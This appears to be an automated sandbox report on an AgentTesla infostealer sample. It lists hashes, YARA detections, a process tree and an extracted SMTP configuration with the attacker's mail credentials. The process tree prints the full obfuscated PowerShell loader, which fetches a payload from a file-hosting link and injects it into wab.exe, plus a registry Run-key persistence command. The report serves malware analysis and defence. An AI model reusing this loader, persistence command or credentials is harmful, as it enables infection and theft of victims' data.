Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-04-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e.vbs
Resource
win10v2004-20240226-en
General
-
Target
a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e.vbs
-
Size
107KB
-
MD5
445148434bd2a15989252974b9970586
-
SHA1
d3287d54b993761e68470b518236424b93ed3379
-
SHA256
a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e
-
SHA512
8a9ca470269241ad4d4441151209b2a5f0dcd48b6b106567c25da61151696a9205c1c6312ae695ff139b8d425f0e841887a9479947f4c5b398d8c239cc7053ed
-
SSDEEP
3072:W7m5h8560AY5aIFxCQCQSgX6Aaqmftp+z7bvHfVTnydFiCuA2:W7m5660AY5aIFxCOSgX6Aaqmftpg77Hj
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.myhydropowered.com - Port:
587 - Username:
[email protected] - Password:
0nVaQweHLu8RyVL - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL -
Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
resource yara_rule behavioral1/memory/2216-65-0x00000000002B0000-0x0000000001312000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients behavioral1/memory/2216-68-0x00000000002B0000-0x00000000002F2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Undualizes% -w 1 $Sodende=(Get-ItemProperty -Path 'HKCU:\\Vithard\\').Befstelserne;%Undualizes% ($Sodende)" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\FTSKIaM = "C:\\Users\\Admin\\AppData\\Roaming\\FTSKIaM\\FTSKIaM.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 11 drive.google.com 4 drive.google.com 5 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 api.ipify.org 18 api.ipify.org 19 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2216 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2556 powershell.exe 2216 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2556 set thread context of 2216 2556 powershell.exe 35 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 2308 reg.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2816 powershell.exe 2556 powershell.exe 2216 wab.exe 2216 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 2216 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2216 wab.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2140 wrote to memory of 2816 2140 WScript.exe 31 PID 2140 wrote to memory of 2816 2140 WScript.exe 31 PID 2140 wrote to memory of 2816 2140 WScript.exe 31 PID 2816 wrote to memory of 2556 2816 powershell.exe 34 PID 2816 wrote to memory of 2556 2816 powershell.exe 34 PID 2816 wrote to memory of 2556 2816 powershell.exe 34 PID 2816 wrote to memory of 2556 2816 powershell.exe 34 PID 2556 wrote to memory of 2216 2556 powershell.exe 35 PID 2556 wrote to memory of 2216 2556 powershell.exe 35 PID 2556 wrote to memory of 2216 2556 powershell.exe 35 PID 2556 wrote to memory of 2216 2556 powershell.exe 35 PID 2556 wrote to memory of 2216 2556 powershell.exe 35 PID 2556 wrote to memory of 2216 2556 powershell.exe 35 PID 2216 wrote to memory of 1080 2216 wab.exe 36 PID 2216 wrote to memory of 1080 2216 wab.exe 36 PID 2216 wrote to memory of 1080 2216 wab.exe 36 PID 2216 wrote to memory of 1080 2216 wab.exe 36 PID 1080 wrote to memory of 2308 1080 cmd.exe 38 PID 1080 wrote to memory of 2308 1080 cmd.exe 38 PID 1080 wrote to memory of 2308 1080 cmd.exe 38 PID 1080 wrote to memory of 2308 1080 cmd.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a27b31b2cb02ae9200b74ceb014df30696094c333fe23ede2bdc78df16e3587e.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Lyseholderne;++$Lyseholderne;$Lyseholderne=$Lyseholderne-1;Function Fupmagers ($Ribbonfishes){$Ringsted=5;$Ringsted++;For($Blockish=5; $Blockish -lt $Ribbonfishes.Length-1; $Blockish+=$Ringsted){$Campodeiform = 'substring';$Skinmanvrer=$Ribbonfishes.$Campodeiform.Invoke($Blockish, 1);$lbesod=$lbesod+$Skinmanvrer}$lbesod;}$Foreskrivende=Fupmagers 'CompahSint tOpstat Des pAg.rksDamps:Monke/ Pini/BallodKnobbr VaesiSquamv orgie Topf.,rolog StraoCritio TaalgUdslul ,nspeSvo,l.Regalc wifto .nokmBy,og/Un miu KlepcBustu?TegumeSaltoxDescrp ,ileo RajbrSystet etap=BleacdUmiskoCohe,wRedisnIndfalfosteoHndela UdpodViktu&Untimi Alkod Semi= dfrs1FilmhULata,lPinna6Sch lW Prdi_ .efr0SpeerHBotc p stviIfor i_ServixIndbe3SeleceEvildbSatel0U resGParamMTonar_OvermBShe le LentaUdloetUnhomxOptrkg Afpr7Et gev erraIDec,sDledesSMisanM.yxoshLosse1Brist ';$Murings=$Foreskrivende.split([char]62);$Foreskrivende=$Murings[0];$Pinnaces=Fupmagers 'PenduiDram.e vejoxSkatt ';$Bugtalerens = Fupmagers 'Bludg\,lthesTa teyTastes Nonew speo EndowOve.r6 alle4A,sla\TilsvWSadduimeeksnTyphod oflloArc.dwFrakesInterPSpndso Thinw avemeUpsenr,omplSAfkalh,ffaeeSknsvlSvrddlHek.e\ L bbvOpblo1Isoph.Tu.er0churr\Allemp P,nwoSkrmmwHo,toeDianmrSpecisf,ihehToxopekongelSkandlOmreg.,ripoebedraxTranse Un d ';&($Pinnaces) (Fupmagers 'Sikke$TietsL AminuTrites Capei SulttMarteaDeictn O,saiC.eloaWardw=Komma$GradmePr.nsnunmeavResi,: M,dtw KvleiGennenElevdd Undli T.berMinis ') ;&($Pinnaces) (Fupmagers 'Landb$ deceBFremmu Turag.ilmgtBenaaaEncyclErkeneSkyldr,verieLandsnKampis Fade=Spond$Ven.iLLageruVidvisVide.iMignotmateraOverinHo.dniSacchaAcroa+ Efte$.parcBHypnouRets,gPse.dtCe tra S erlUnexpe ElskrProfieLeopanNeurosOblig ') ;&($Pinnaces) (Fupmagers 'Vedhe$St,ndCSugeph Ejena Pattl folkc H kkoTulregMa,tfrTetraapaleopUntithChaney Fir Retr,= espr Banke(Gensp(Gu.lagKritiwS,raamKammeiDoubt UnsouwProgriFedtdnBrite3 Kort2Evapo_.phodpSj ekrGneisoElectcSmaabestenks StipsStilk Raso-MedinF Chue Tofu,P Ko,nrMarino,ystecCabo e Ex.rsSvi.tsUn.erISheepdHakke=Spott$Bel s{Af.enPUdstaIVeilyDQ ain}Decum)Triaz.ReentCRecitoKrydrm,etromEnti,aSkrivn,rmbedRelabL Macri Po cnHernieFrilu)mahog Sp.gn- E.ensCominpE.uanlRigsriAnocitTank. Batte[ Dyk,c,kkomhPrtenaCon arSkrll] Nond3 .nds4Menin ');&($Pinnaces) (Fupmagers 'N,ell$XerogSRest.mSmu,skTe.plkSvenseMarc tChie, rabb=Baat. Blan$SprinCEje.phTagetaAutoglOd sscJawanoSzilagS,nscrTriarafdevap DisphcornfySugge[Tegum$ ConnCBagfjhSbeuraRer,ulValancFamilo DurigIsomorNonpea Skndp MehahDightyletha.Mettlco.ensoInte,uBefrunThirlt Aut.-Homoa2Agerk]Elem, ');&($Pinnaces) (Fupmagers ' vari$BispeSZygomaHippomGonzas Su,kiOutsanInflegBedd scath,=Jem,a(P omeTTubs.eDiabosSardit Lan -RekomPUncoma A,tetMullghHekse Anhel$Sel,sBB,tteuBredngIn.hutGelataDerell .naveOp,pirpuriteLregrns,lvbsAcamp)Unan, Sac,h-TilsyAIndesnTiltvd Rh,z karak( Rose[RundbI Sty nOuncet UddaPSelvstExegerRevan] Deko:Inspi:Dip,esDipl,i alkezAld leoveri Nasc-HaycoeMik.oqVerde Esoan8.entu)Un.xp ') ;if ($Samsings) {.$Bugtalerens $Smkket;} else {;$Udmugnings=Fupmagers 'SkrifS.forktBgretaDepotr,ntagtearoc-HomesBSemiaitvrvetPhotosOmklaT,yehorGni,taS.rignQuaggsEyenpfJu.efe Jay.rForb, Ra.gl-Dikk.S S.bpopreinu S,ekrskandcHydroenondi Thay$genreFAmaisoudtnkrNitroeNyvalsDiscok Therr.rapeiHydrav,myateEle tnResetdMilpaeBigmo Rds.l-PligtD Udpae,erips ForntBagvgiR osen Sassa M ratModifiReinvoSta.mnFlere Seme$ DannLM lliu.ichisDaundiM stntFrownaVandenPow riTensoa Ranc ';&($Pinnaces) (Fupmagers ' epti$ForsyLTonenu tr.ns Adhri,ansttUphhoa ueesnglo.eidyrsbaWinie= Epau$Ko,ceeLe con,arbavAf ad:Eval,aOr.itp Nau p.honddVandlaIdylstSuppeaFunkt ') ;&($Pinnaces) (Fupmagers ' T reI Erfam FrempMetapoMorterDam ptNonre-Mo.erM Gravo.hytodNumeruFabrilT,rmie m la ConveBoutbaiSenget BronsPelseTC,everAsc,ia ElsknSaligsBlotef PaabeTomatrHanny ') ;$Lusitania=$Lusitania+'\Rentrykningers.Jor';while (-not $Tungebaand) {&($Pinnaces) (Fupmagers 'ill.m$ GradTFla,luBuckenThemigPrygleprismbNoctuaStj.maAarssnAcromd Unst=Zoo o(UdtryT,xamie,orjas,idtstNgleo-formiP S.agaPreoctKnetchBewre Camer$HermaLTran.u liefs Notii Eye,t Retaamas enOpdiginieceaTe,pl),evem ') ;&($Pinnaces) $Udmugnings;&($Pinnaces) (Fupmagers 'HemstSTentht Afvaalude,rMistatSo em-.tormS OpsklRankee .anieFloodp,urum Aarin5F mil ');$Foreskrivende=$Murings[$Divagatory218++%$Murings.count];}&($Pinnaces) (Fupmagers 'Pyrol$ tewDDemorrEpizoiKo.ikftangot .ndes Musei Repuk U der SiloiAdjacnstringU.pleeMicror.eroesTeste Aerie= F,ge ImpuG ikieIonentc kel-SdcelCSkudloUnre n GhostFastpeBlawinTrbnkt sljd Baand$U derLAnt.au He,is PreciBru et So daFlykan unhai Razoaidoli ');&($Pinnaces) (Fupmagers 'Bill,$Miss.C .lekoErgoguElectnCotilt.tarteTremurinitip,ehanuUnde.n.ilicc Sa,mhGal ie olinr Phon Trans=punki .feme[EloigSRoutiy A ops,drejtNatureIcosamPrior.revolCBamseo PrornEpithvSko eeTissurStdnitIndpo]Kr.ft:Ar,me:Tran.FPreser Entrofedthm Tek B StrkaSpantsKred.eBe,in6Supra4 SperSSvrvgtGuldgr Minei Robin evigIndsm(ponte$SnippDAuthor babiiAntrof LeartOrkans LoggiDriblkspecirO,setiAnthrn,quipgPrveleBurlerFortrsEle.t)Tveba ');&($Pinnaces) (Fupmagers 'regis$,eleoSLivsfyXan,hdU,wonnSolske EgnsyIndv i,odudtPick,eSy.kr Daer= Smal Acrem[ RingS SubpyTel.vs.ytictJomfrePolarmKlore.Lin aTUn.edeSupe,xSnurrt,rkit.O.oleE TrannsclifcKrigsoUmteed Ov.riCathonVidaag,ajer] W az:Blt,s:VveriAP,rkiSHo otCF,derI.lausI Sjo..BetonG Cof,esweept GaulSBee ctPteryrT,puliI durnMelisgEmbos(foreg$Si.elCLe.inoT ngbu Ro.dnSpyglt.abule ,etsrBrumopModtauD fylnDemagcTungshAftereReturrKrebi) .enf ');&($Pinnaces) (Fupmagers 'Harm.$ArtsfCMbelal StetaZymossSerensTrre.mScabbaIntertInt.ne,ekno= Fors$AtollSS lvfynastid fle nNonabeBlegsyCleaniA,aintSmo reDissi.D.kansLike,uPariabsektisGrn,et,teror,repaiSa.eln tollg R.sp(Kolbt3spumi2Under7 Styr5Frapp7T,lst3 lage, Fodb2 Bryn5 Ga.a0 Elli3Abibf4Tremp)Tebor ');&($Pinnaces) $Classmate;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Lyseholderne;++$Lyseholderne;$Lyseholderne=$Lyseholderne-1;Function Fupmagers ($Ribbonfishes){$Ringsted=5;$Ringsted++;For($Blockish=5; $Blockish -lt $Ribbonfishes.Length-1; $Blockish+=$Ringsted){$Campodeiform = 'substring';$Skinmanvrer=$Ribbonfishes.$Campodeiform.Invoke($Blockish, 1);$lbesod=$lbesod+$Skinmanvrer}$lbesod;}$Foreskrivende=Fupmagers 'CompahSint tOpstat Des pAg.rksDamps:Monke/ Pini/BallodKnobbr VaesiSquamv orgie Topf.,rolog StraoCritio TaalgUdslul ,nspeSvo,l.Regalc wifto .nokmBy,og/Un miu KlepcBustu?TegumeSaltoxDescrp ,ileo RajbrSystet etap=BleacdUmiskoCohe,wRedisnIndfalfosteoHndela UdpodViktu&Untimi Alkod Semi= dfrs1FilmhULata,lPinna6Sch lW Prdi_ .efr0SpeerHBotc p stviIfor i_ServixIndbe3SeleceEvildbSatel0U resGParamMTonar_OvermBShe le LentaUdloetUnhomxOptrkg Afpr7Et gev erraIDec,sDledesSMisanM.yxoshLosse1Brist ';$Murings=$Foreskrivende.split([char]62);$Foreskrivende=$Murings[0];$Pinnaces=Fupmagers 'PenduiDram.e vejoxSkatt ';$Bugtalerens = Fupmagers 'Bludg\,lthesTa teyTastes Nonew speo EndowOve.r6 alle4A,sla\TilsvWSadduimeeksnTyphod oflloArc.dwFrakesInterPSpndso Thinw avemeUpsenr,omplSAfkalh,ffaeeSknsvlSvrddlHek.e\ L bbvOpblo1Isoph.Tu.er0churr\Allemp P,nwoSkrmmwHo,toeDianmrSpecisf,ihehToxopekongelSkandlOmreg.,ripoebedraxTranse Un d ';&($Pinnaces) (Fupmagers 'Sikke$TietsL AminuTrites Capei SulttMarteaDeictn O,saiC.eloaWardw=Komma$GradmePr.nsnunmeavResi,: M,dtw KvleiGennenElevdd Undli T.berMinis ') ;&($Pinnaces) (Fupmagers 'Landb$ deceBFremmu Turag.ilmgtBenaaaEncyclErkeneSkyldr,verieLandsnKampis Fade=Spond$Ven.iLLageruVidvisVide.iMignotmateraOverinHo.dniSacchaAcroa+ Efte$.parcBHypnouRets,gPse.dtCe tra S erlUnexpe ElskrProfieLeopanNeurosOblig ') ;&($Pinnaces) (Fupmagers 'Vedhe$St,ndCSugeph Ejena Pattl folkc H kkoTulregMa,tfrTetraapaleopUntithChaney Fir Retr,= espr Banke(Gensp(Gu.lagKritiwS,raamKammeiDoubt UnsouwProgriFedtdnBrite3 Kort2Evapo_.phodpSj ekrGneisoElectcSmaabestenks StipsStilk Raso-MedinF Chue Tofu,P Ko,nrMarino,ystecCabo e Ex.rsSvi.tsUn.erISheepdHakke=Spott$Bel s{Af.enPUdstaIVeilyDQ ain}Decum)Triaz.ReentCRecitoKrydrm,etromEnti,aSkrivn,rmbedRelabL Macri Po cnHernieFrilu)mahog Sp.gn- E.ensCominpE.uanlRigsriAnocitTank. Batte[ Dyk,c,kkomhPrtenaCon arSkrll] Nond3 .nds4Menin ');&($Pinnaces) (Fupmagers 'N,ell$XerogSRest.mSmu,skTe.plkSvenseMarc tChie, rabb=Baat. Blan$SprinCEje.phTagetaAutoglOd sscJawanoSzilagS,nscrTriarafdevap DisphcornfySugge[Tegum$ ConnCBagfjhSbeuraRer,ulValancFamilo DurigIsomorNonpea Skndp MehahDightyletha.Mettlco.ensoInte,uBefrunThirlt Aut.-Homoa2Agerk]Elem, ');&($Pinnaces) (Fupmagers ' vari$BispeSZygomaHippomGonzas Su,kiOutsanInflegBedd scath,=Jem,a(P omeTTubs.eDiabosSardit Lan -RekomPUncoma A,tetMullghHekse Anhel$Sel,sBB,tteuBredngIn.hutGelataDerell .naveOp,pirpuriteLregrns,lvbsAcamp)Unan, Sac,h-TilsyAIndesnTiltvd Rh,z karak( Rose[RundbI Sty nOuncet UddaPSelvstExegerRevan] Deko:Inspi:Dip,esDipl,i alkezAld leoveri Nasc-HaycoeMik.oqVerde Esoan8.entu)Un.xp ') ;if ($Samsings) {.$Bugtalerens $Smkket;} else {;$Udmugnings=Fupmagers 'SkrifS.forktBgretaDepotr,ntagtearoc-HomesBSemiaitvrvetPhotosOmklaT,yehorGni,taS.rignQuaggsEyenpfJu.efe Jay.rForb, Ra.gl-Dikk.S S.bpopreinu S,ekrskandcHydroenondi Thay$genreFAmaisoudtnkrNitroeNyvalsDiscok Therr.rapeiHydrav,myateEle tnResetdMilpaeBigmo Rds.l-PligtD Udpae,erips ForntBagvgiR osen Sassa M ratModifiReinvoSta.mnFlere Seme$ DannLM lliu.ichisDaundiM stntFrownaVandenPow riTensoa Ranc ';&($Pinnaces) (Fupmagers ' epti$ForsyLTonenu tr.ns Adhri,ansttUphhoa ueesnglo.eidyrsbaWinie= Epau$Ko,ceeLe con,arbavAf ad:Eval,aOr.itp Nau p.honddVandlaIdylstSuppeaFunkt ') ;&($Pinnaces) (Fupmagers ' T reI Erfam FrempMetapoMorterDam ptNonre-Mo.erM Gravo.hytodNumeruFabrilT,rmie m la ConveBoutbaiSenget BronsPelseTC,everAsc,ia ElsknSaligsBlotef PaabeTomatrHanny ') ;$Lusitania=$Lusitania+'\Rentrykningers.Jor';while (-not $Tungebaand) {&($Pinnaces) (Fupmagers 'ill.m$ GradTFla,luBuckenThemigPrygleprismbNoctuaStj.maAarssnAcromd Unst=Zoo o(UdtryT,xamie,orjas,idtstNgleo-formiP S.agaPreoctKnetchBewre Camer$HermaLTran.u liefs Notii Eye,t Retaamas enOpdiginieceaTe,pl),evem ') ;&($Pinnaces) $Udmugnings;&($Pinnaces) (Fupmagers 'HemstSTentht Afvaalude,rMistatSo em-.tormS OpsklRankee .anieFloodp,urum Aarin5F mil ');$Foreskrivende=$Murings[$Divagatory218++%$Murings.count];}&($Pinnaces) (Fupmagers 'Pyrol$ tewDDemorrEpizoiKo.ikftangot .ndes Musei Repuk U der SiloiAdjacnstringU.pleeMicror.eroesTeste Aerie= F,ge ImpuG ikieIonentc kel-SdcelCSkudloUnre n GhostFastpeBlawinTrbnkt sljd Baand$U derLAnt.au He,is PreciBru et So daFlykan unhai Razoaidoli ');&($Pinnaces) (Fupmagers 'Bill,$Miss.C .lekoErgoguElectnCotilt.tarteTremurinitip,ehanuUnde.n.ilicc Sa,mhGal ie olinr Phon Trans=punki .feme[EloigSRoutiy A ops,drejtNatureIcosamPrior.revolCBamseo PrornEpithvSko eeTissurStdnitIndpo]Kr.ft:Ar,me:Tran.FPreser Entrofedthm Tek B StrkaSpantsKred.eBe,in6Supra4 SperSSvrvgtGuldgr Minei Robin evigIndsm(ponte$SnippDAuthor babiiAntrof LeartOrkans LoggiDriblkspecirO,setiAnthrn,quipgPrveleBurlerFortrsEle.t)Tveba ');&($Pinnaces) (Fupmagers 'regis$,eleoSLivsfyXan,hdU,wonnSolske EgnsyIndv i,odudtPick,eSy.kr Daer= Smal Acrem[ RingS SubpyTel.vs.ytictJomfrePolarmKlore.Lin aTUn.edeSupe,xSnurrt,rkit.O.oleE TrannsclifcKrigsoUmteed Ov.riCathonVidaag,ajer] W az:Blt,s:VveriAP,rkiSHo otCF,derI.lausI Sjo..BetonG Cof,esweept GaulSBee ctPteryrT,puliI durnMelisgEmbos(foreg$Si.elCLe.inoT ngbu Ro.dnSpyglt.abule ,etsrBrumopModtauD fylnDemagcTungshAftereReturrKrebi) .enf ');&($Pinnaces) (Fupmagers 'Harm.$ArtsfCMbelal StetaZymossSerensTrre.mScabbaIntertInt.ne,ekno= Fors$AtollSS lvfynastid fle nNonabeBlegsyCleaniA,aintSmo reDissi.D.kansLike,uPariabsektisGrn,et,teror,repaiSa.eln tollg R.sp(Kolbt3spumi2Under7 Styr5Frapp7T,lst3 lage, Fodb2 Bryn5 Ga.a0 Elli3Abibf4Tremp)Tebor ');&($Pinnaces) $Classmate;}"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Undualizes% -w 1 $Sodende=(Get-ItemProperty -Path 'HKCU:\Vithard\').Befstelserne;%Undualizes% ($Sodende)"5⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Undualizes% -w 1 $Sodende=(Get-ItemProperty -Path 'HKCU:\Vithard\').Befstelserne;%Undualizes% ($Sodende)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:2308
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD51611c299c292fb3279a0be4c25c80b70
SHA14dd5a3bb68c4636180add32e3fc8b40cfe1d0cab
SHA256289591fbf6842341d322034c50ae34ae74ae61034eaaf7b8660bec09040ddfb3
SHA5128b06c2425986b61dcd27b3fb56b3d5126bedac4ca96fec7df17d048aaf2f9dce0c6424f1b7337e0d9df935f7e3dfcd16db3227a25fd0ddbfa2f0aebfc176c27b
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QRJDF4R62O1IO2R5O4Y3.temp
Filesize7KB
MD5623155ec199e3c4026d37c436fe6bdbe
SHA170738827236f075592b3baa721c039a5be57ba39
SHA256d1c07aad01db3def8fe74e31050ca8b298f90997cdf3f215937bffe9aab23b21
SHA512efa39d71d5fca1429a4c53d3fd1993f8ed3027fe67e9e79c81f25f21fdade09b44b8e2138ef5d4d6e1ff9e16ae85750b4b1bcda834e1429ddc72ed5ff1048d95